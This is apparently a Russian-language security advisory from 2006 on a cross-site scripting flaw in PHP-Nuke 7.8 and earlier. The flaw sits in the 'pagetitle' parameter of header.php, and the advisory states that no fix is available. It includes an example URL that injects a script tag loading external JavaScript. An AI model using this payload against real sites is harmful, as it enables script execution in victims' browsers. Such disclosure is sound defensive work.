Межсайтовый скриптинг в PHP-Nuke

Дата публикации:
14.02.2006
Всего просмотров:
2303
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP-Nuke 6.x
PHP-Nuke 7.x
Уязвимые версии: PHP-Nuke 7.8 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "pagetitle" в сценарии "header.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/?pagetitle=title</title></head><script+src=http://[host]/script.js?

URL производителя: www.phpnuke.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: [waraxe-2006-SA#044] - XSS in phpNuke 7.8 and older versions

или введите имя

CAPTCHA